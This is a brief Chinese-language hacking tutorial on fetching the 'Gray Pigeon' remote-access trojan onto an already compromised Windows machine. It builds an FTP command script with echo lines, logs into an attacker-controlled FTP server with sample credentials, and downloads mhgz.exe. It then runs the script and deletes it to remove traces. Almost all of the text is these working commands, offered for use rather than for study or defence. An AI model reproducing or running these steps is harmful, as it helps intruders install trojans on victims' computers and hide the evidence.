在远程计算机的CMD环境下，如果不能通过IPC$渠道传送文件，那就只有通过FTP下载文件了。

假设我们已经有一个FTP服务器，上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数：
1、FTP服务器的IP地址：如203.75.44.34
2、FTP服务器的用户名：如tty
3、FTP服务器的密 码：如tty123

在远程计算机的CMD下依次输入下面的命令
1、echo open 203.75.44.34>>tty.txt 登陆FTP服务器
2、echo tty>>tty.txt 用户名
3、echo tty123>>tty.txt 密码
4、echo bin>>tty.txt 开始
5、echo get mhgz.exe>>tty.txt 下载灰鸽子木马
6、echo bye>>tty.txt 关闭FTP服务器

输入上面命令后，在远程计算机上就会生成一个tty.txt文件，内容为：
open 203.75.44.34
tty
tty123
bin
get mhgz.exe
bye

现在我们在远程计算机上执行下面的命令：
ftp -s:tty.txt 意思是，读取tty.txt里的参数，执行ftp命令，命令执行完后，灰鸽子木马文件mhgz.exe就下载到对方计算机里了。

del c:\tty.txt